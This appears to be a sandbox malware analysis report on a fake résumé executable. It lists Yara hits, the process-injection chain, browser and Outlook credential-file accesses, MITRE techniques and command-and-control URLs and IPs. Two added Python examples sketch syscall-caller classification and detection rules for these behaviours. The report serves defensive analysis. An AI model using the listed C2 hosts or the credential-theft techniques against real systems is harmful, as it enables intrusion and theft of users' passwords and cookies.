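The "Direct from:" records in this section give, for each Nt* call, the address the syscall was issued from. Whether such a call is "direct" in the usual sense depends on whether that address lies inside ntdll's mapped image, and the report does not print the module layout. The Python below is an added example, not code from the report or from Joe Sandbox: it parses records in the report's own format, classifies each caller against a module map, and groups the non-ntdll callers by 4 KiB page so that a single stub table stands out from scattered inline syscalls. The module map, the eight-record sample and every function name are this example's assumptions; substitute the real module ranges (for instance from a memory dump) before drawing conclusions about the sample.

```python
import re
from collections import defaultdict

# Constructed input: eight of the "Direct from:" records listed in this section,
# copied as printed so the parser is exercised on the report's own format.
REPORT_LINES = [
    "NtAllocateVirtualMemory: Direct from: 0x76EF48EC",
    "NtAllocateVirtualMemory: Direct from: 0x76EF2BEC",
    "NtProtectVirtualMemory: Direct from: 0x76EF2F9C",
    "NtProtectVirtualMemory: Direct from: 0x76EE7B2E",
    "NtWriteVirtualMemory: Direct from: 0x76EF2E3C",
    "NtMapViewOfSection: Direct from: 0x76EF2D1C",
    "NtSetInformationThread: Direct from: 0x76EE63F9",
    "NtCreateUserProcess: Direct from: 0x76EF371C",
]

# Hypothetical 32-bit module map, name -> (base, end). The report does not list
# module load addresses, so these ranges are an assumption of the example and
# must be replaced with the real layout before use.
MODULE_MAP = {
    "ntdll.dll": (0x77300000, 0x77480000),
    "kernel32.dll": (0x75F00000, 0x75FF0000),
}

RECORD_RE = re.compile(r"(?P<api>Nt\w+): Direct from: 0x(?P<addr>[0-9A-Fa-f]+)")


def parse_records(lines):
    """Return [(api, caller_address)] for each line in the report's 'Direct from:' format."""
    records = []
    for line in lines:
        m = RECORD_RE.search(line)
        if m:
            records.append((m.group("api"), int(m.group("addr"), 16)))
    return records


def owning_module(addr, module_map):
    """Name of the mapped module containing addr, or None if the address is unbacked."""
    for name, (base, end) in module_map.items():
        if base <= addr < end:
            return name
    return None


def classify(records, module_map):
    """Label each record 'ntdll' (where a syscall is expected to be issued from),
    'module:<name>' (some other image) or 'unbacked' (no image at all)."""
    labelled = []
    for api, addr in records:
        mod = owning_module(addr, module_map)
        if mod == "ntdll.dll":
            label = "ntdll"
        elif mod is not None:
            label = "module:" + mod
        else:
            label = "unbacked"
        labelled.append((api, addr, label))
    return labelled


def per_api_summary(labelled, page=0x1000):
    """Per API: how many calls did not come from ntdll, and which 4 KiB pages they came from."""
    summary = defaultdict(lambda: {"direct": 0, "pages": set()})
    for api, addr, label in labelled:
        if label != "ntdll":
            summary[api]["direct"] += 1
            summary[api]["pages"].add(addr & ~(page - 1))
    return dict(summary)


def caller_pages(labelled, page=0x1000):
    """Distinct pages hosting non-ntdll syscall callers. Many different APIs issued
    from a handful of adjacent pages points at one stub table rather than
    syscalls inlined all over the payload."""
    return sorted({addr & ~(page - 1) for _, addr, label in labelled if label != "ntdll"})


if __name__ == "__main__":
    rows = classify(parse_records(REPORT_LINES), MODULE_MAP)
    for api, addr, label in rows:
        print(f"{api:28s} 0x{addr:08X}  {label}")
    print("caller pages:", [hex(p) for p in caller_pages(rows)])
```

With the hypothetical map every sampled caller is unbacked and the callers collapse onto five adjacent pages; with a real map in which 0x76EE0000 onwards belongs to ntdll, the same records would classify as ordinary ntdll calls, which is exactly why the module layout has to come from the analysed process and not from a guess.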

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Curriculum Vitae.exe | Binary or memory string: WIN_81
Source: Curriculum Vitae.exe | Binary or memory string: WIN_XP
Source: Curriculum Vitae.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Curriculum Vitae.exe | Binary or memory string: WIN_XPe
Source: Curriculum Vitae.exe | Binary or memory string: WIN_VISTA
Source: Curriculum Vitae.exe | Binary or memory string: WIN_7
Source: Curriculum Vitae.exe | Binary or memory string: WIN_8
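Two groups of records in the report are worth turning into host-side detection logic: the process chain in the evasion section (svchost.exe launched with the sample's own command line, regsvr32.exe started with no arguments, firefox.exe spawned by regsvr32.exe) and the credential-store accesses above (regsvr32.exe opening Chrome and Edge "Login Data" files and the Outlook profiles key). The Python below is an added example, not part of the report: it runs a handful of rules over a constructed event list modelled on those records and includes one benign control (Chrome reading its own store) that must stay quiet. The event schema, the rule names and the process ids are assumptions of the example; map them onto whatever telemetry (Sysmon, an EDR) you actually collect.

```python
# Constructed event stream modelled on the process tree and the file/registry
# accesses listed in this report; the dict keys are this example's own schema,
# not Sysmon's or any EDR's field names. Process ids are made up.
EVENTS = [
    {"type": "process", "pid": 2,
     "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\Curriculum Vitae.exe"',
     "parent_image": r"C:\Users\user\Desktop\Curriculum Vitae.exe"},
    {"type": "process", "pid": 6,
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r'"C:\Windows\SysWOW64\regsvr32.exe"',
     "parent_image": r"C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe"},
    {"type": "process", "pid": 8,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"',
     "parent_image": r"C:\Windows\SysWOW64\regsvr32.exe"},
    {"type": "file", "pid": 6, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file", "pid": 6, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"type": "registry", "pid": 6, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "key": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"},
    # Benign control: the browser reading its own store must not fire any rule.
    {"type": "file", "pid": 9, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

# Credential stores and the one process image allowed to touch them (lower-cased markers).
BROWSER_STORES = {
    "\\google\\chrome\\user data\\": "chrome.exe",
    "\\microsoft\\edge\\user data\\": "msedge.exe",
}
SENSITIVE_FILES = {"login data", "cookies", "web data", "local state"}
OUTLOOK_PROFILES = "\\windows messaging subsystem\\profiles\\"


def basename(path):
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_cmdline(cmdline):
    """Return (executable, arguments) of a Windows command line, honouring a quoted image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            return s[1:], ""
        return s[1:end], s[end + 1:].strip()
    exe, _, rest = s.partition(" ")
    return exe, rest.strip()


def triage(events):
    """Run every rule over the stream; return [(pid, rule_name, detail)]."""
    findings = []
    for e in events:
        img = basename(e["image"])
        if e["type"] == "process":
            parent = basename(e.get("parent_image", ""))
            exe, args = split_cmdline(e["cmdline"])
            claimed = basename(exe)
            # The command line names a different executable than the image on disk:
            # typical of hollowing, where svchost.exe inherits the injector's command line.
            if claimed != img:
                findings.append((e["pid"], "cmdline_image_mismatch", f"{img} claims to be {claimed}"))
            # svchost.exe is normally a child of services.exe.
            if img == "svchost.exe" and parent != "services.exe":
                findings.append((e["pid"], "svchost_unusual_parent", parent))
            # regsvr32.exe with no DLL to register has nothing legitimate to do.
            if img == "regsvr32.exe" and not args:
                findings.append((e["pid"], "regsvr32_no_arguments", e["cmdline"]))
            if parent == "regsvr32.exe":
                findings.append((e["pid"], "regsvr32_spawned_child", img))
        elif e["type"] == "file":
            path = e["path"].lower()
            name = basename(e["path"])
            for marker, owner in BROWSER_STORES.items():
                if marker in path and name in SENSITIVE_FILES and img != owner:
                    findings.append((e["pid"], "browser_store_foreign_access", f"{img} -> {e['path']}"))
        elif e["type"] == "registry":
            if OUTLOOK_PROFILES in e["key"].lower() and img != "outlook.exe":
                findings.append((e["pid"], "outlook_profile_foreign_access", img))
    return findings


def rules_for(findings, pid):
    """Sorted, de-duplicated rule names that fired for one process id."""
    return sorted({rule for p, rule, _ in findings if p == pid})


if __name__ == "__main__":
    for pid, rule, detail in triage(EVENTS):
        print(f"pid {pid:<3} {rule:32s} {detail}")
```

Run stand-alone it prints seven findings: two for the hollowed svchost.exe, four for regsvr32.exe (no arguments, two browser stores, the Outlook profiles key), one for the firefox.exe child, and nothing for the chrome.exe control.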

Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DB1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Curriculum Vitae.exe | Code function: 0_2_00DB1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix (tactic: techniques to which the report attaches a figure; the figures are reproduced as printed in the matrix; tactics with no figure in any cell are listed as none matched):

Reconnaissance: none matched
Resource Development: none matched
Initial Access: Valid Accounts (2)
Execution: Native API (1)
Persistence: DLL Side-Loading (1), Valid Accounts (2)
Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412)
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (12), Access Token Manipulation (21), Process Injection (412)
Credential Access: OS Credential Dumping (1), Input Capture (21)
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (116), Security Software Discovery (241), Virtualization/Sandbox Evasion (12), Process Discovery (3), Application Window Discovery (1), System Owner/User Discovery (1)
Lateral Movement: none matched
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3)
Command and Control: Ingress Tool Transfer (4), Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (4)
Exfiltration: none matched
Impact: System Shutdown/Reboot (1)
Behavior Graph ID: 1501087 | Sample: Curriculum Vitae.exe | Start date: 29/08/2024 | Architecture: WINDOWS | Score: 100

Sample-level network: www.mediaplug.biz; www.marcoiozia.info; 5 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures

Process tree:
Curriculum Vitae.exe (started). Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
    svchost.exe (started). Signatures: Maps a DLL or memory area into another process
        OAIexgManRWDie.exe (injected). Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            regsvr32.exe (started). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                OAIexgManRWDie.exe (injected). Signatures: Found direct / indirect Syscall (likely to bypass EDR). Network: marcoiozia.info 195.110.124.133, ports 55085, 55086, 55087, REGISTER-ASIT, Italy; godoggyonbase.online 84.32.84.32, ports 55089, 55090, 55091, NTT-LT-ASLT, Lithuania; 2 other IPs or domains
                firefox.exe (started)

Source | Detection | Scanner | Label
Curriculum Vitae.exe | 66% | ReversingLabs | Win32.Worm.DorkBot
Curriculum Vitae.exe | 60% | Virustotal |
Curriculum Vitae.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
www.chinaen.org | 0% | Virustotal |
www.mediaplug.biz | 0% | Virustotal |
171.39.242.20.in-addr.arpa | 0% | Virustotal |

Source | Detection | Scanner | Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4 | 0% | Avira URL Cloud | safe
http://www.chinaen.org/lol/198.html | 0% | Avira URL Cloud | safe
http://www.marcoiozia.info/6u21/?QpGDsvFp=aL/4TjGztHWcUB/Ah5XMbJsPVjcLX5spIqygDBReB+gjFi+JNHxT0K0F5MtDhvjmRAZ0VF/vQduwy3cjjhNQXD5C3/i7fPsqWYlJ4opKyF5MG7GdSMwyyOQYqJ9RHJTdWA==&en=KRMtj8Zx1f- | 0% | Avira URL Cloud | safe
http://www.chinaen.org/lol/195.html | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
http://www.chinaen.org/lol/198.html | 0% | Virustotal |
http://www.chinaen.org/lol/202.html | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4 | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4 | 0% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js | 0% | Virustotal |
http://www.chinaen.org/lol/202.html | 0% | Virustotal |
http://www.chinaen.org/lol/ | 0% | Avira URL Cloud | safe
http://www.chinaen.org/lol/197.html | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://www.chinaen.org/lol/203.html | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4 | 0% | Virustotal |
http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css | 0% | Avira URL Cloud | safe
http://www.chinaen.org/lol/197.html | 0% | Virustotal |
http://www.chinaen.org/lol/195.html | 0% | Virustotal |
http://www.godoggyonbase.online/2b9b/?QpGDsvFp=ZHAZUszVkZojOh6l4QgRWsOseo6gnr5+/9v7uoYYl6Pb3zYSipzXXNStKfhRGhUQf6Tergy2VCT+UWp4uEi/6TdO8TzwggtBmSoW3KZOjFFDDhjE/y85QqgGs38SMRVr8g==&en=KRMtj8Zx1f- | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css | 0% | Virustotal |
http://www.chinaen.org/lol/200.html | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal |
http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png | 0% | Avira URL Cloud | safe
http://www.chinaen.org/ | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_system/login.php | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css | 0% | Virustotal |
http://www.chinaen.org/lol/203.html | 0% | Virustotal |
https://www.zblogcn.com/ | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4 | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png | 0% | Virustotal |
http://www.chinaen.org/lol/201.html | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_system/login.php | 0% | Virustotal |
http://www.chinaen.org/lol/ | 0% | Virustotal |
https://www.zblogcn.com/ | 1% | Virustotal |
https://www.htmlit.com.cn/ | 0% | Avira URL Cloud | safe
http://www.chinaen.org/ | 0% | Virustotal |
http://www.marcoiozia.info/6u21/ | 0% | Avira URL Cloud | safe
http://www.chinaen.org/lol/201.html | 0% | Virustotal |
http://www.chinaen.org/lol/200.html | 0% | Virustotal |
http://www.chinaen.org/lol/204.html | 0% | Avira URL Cloud | safe
http://www.chinaen.org/search.php?act=search | 0% | Avira URL Cloud | safe
http://www.mediaplug.biz/13ne/ | 0% | Avira URL Cloud | safe
http://www.mediaplug.biz | 0% | Avira URL Cloud | safe
https://www.htmlit.com.cn/ | 0% | Virustotal |
http://www.mediaplug.biz | 0% | Virustotal |
http://www.godoggyonbase.online/2b9b/ | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css | 0% | Avira URL Cloud | safe
http://www.marcoiozia.info/6u21/ | 1% | Virustotal |
http://www.chinaen.org/zb_system/script/c_html_js_add.php | 0% | Avira URL Cloud | safe
http://www.chinaen.org/lol/199.html | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4 | 0% | Virustotal |
http://www.mediaplug.biz/13ne/ | 1% | Virustotal |
http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css | 0% | Virustotal |
http://www.chinaen.org/search.php?act=search | 0% | Virustotal |
http://www.chinaen.org/zt7d/?QpGDsvFp=KcI7zOUatYggDJ3AV9ydt+9IOITQmx5DA5xygALe8uDfsJvPSx2pTS8MbER0fEeW+0g1hrhWUIgkLG8bo3rrAlPfGKh0dC1LPhQcHC1DvDFG/ug/vgNVnHXaPgixFLXzAw==&en=KRMtj8Zx1f- | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_system/script/c_html_js_add.php | 0% | Virustotal |
http://www.chinaen.org/lol/196.html | 0% | Avira URL Cloud | safe
http://www.chinaen.org/zb_system/script/zblogphp.js | 0% | Avira URL Cloud | safe
http://www.chinaen.org/lol/204.html | 0% | Virustotal |
http://www.godoggyonbase.online/2b9b/ | 1% | Virustotal |
http://www.chinaen.org/lol/199.html | 0% | Virustotal |
http://www.chinaen.org/lol/196.html | 0% | Virustotal |
http://www.chinaen.org/zb_system/script/zblogphp.js | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.chinaen.org | 188.114.96.3 | true | true | | unknown
marcoiozia.info | 195.110.124.133 | true | true | | unknown
godoggyonbase.online | 84.32.84.32 | true | true | | unknown
www.mediaplug.biz | 66.81.203.200 | true | true | | unknown
www.marcoiozia.info | unknown | unknown | true | | unknown
www.godoggyonbase.online | unknown | unknown | true | | unknown
171.39.242.20.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.marcoiozia.info/6u21/?QpGDsvFp=aL/4TjGztHWcUB/Ah5XMbJsPVjcLX5spIqygDBReB+gjFi+JNHxT0K0F5MtDhvjmRAZ0VF/vQduwy3cjjhNQXD5C3/i7fPsqWYlJ4opKyF5MG7GdSMwyyOQYqJ9RHJTdWA==&en=KRMtj8Zx1f- | true | Avira URL Cloud: safe | unknown
http://www.godoggyonbase.online/2b9b/?QpGDsvFp=ZHAZUszVkZojOh6l4QgRWsOseo6gnr5+/9v7uoYYl6Pb3zYSipzXXNStKfhRGhUQf6Tergy2VCT+UWp4uEi/6TdO8TzwggtBmSoW3KZOjFFDDhjE/y85QqgGs38SMRVr8g==&en=KRMtj8Zx1f- | true | Avira URL Cloud: safe | unknown
http://www.marcoiozia.info/6u21/ | true | Virustotal: 1%; Avira URL Cloud: safe | unknown
http://www.mediaplug.biz/13ne/ | true | Virustotal: 1%; Avira URL Cloud: safe | unknown
http://www.godoggyonbase.online/2b9b/ | true | Virustotal: 1%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/zt7d/?QpGDsvFp=KcI7zOUatYggDJ3AV9ydt+9IOITQmx5DA5xygALe8uDfsJvPSx2pTS8MbER0fEeW+0g1hrhWUIgkLG8bo3rrAlPfGKh0dC1LPhQcHC1DvDFG/ug/vgNVnHXaPgixFLXzAw==&en=KRMtj8Zx1f- | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.chinaen.org/zb_users/theme/yd1125free/style/css/normalize.css | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/lol/198.html | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4 | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/lol/195.html | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/zb_system/script/jquery-2.2.4.min.js | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/lol/202.html | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/zb_users/theme/yd1125free/script/common.js?v=1.2.4 | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/lol/ | firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
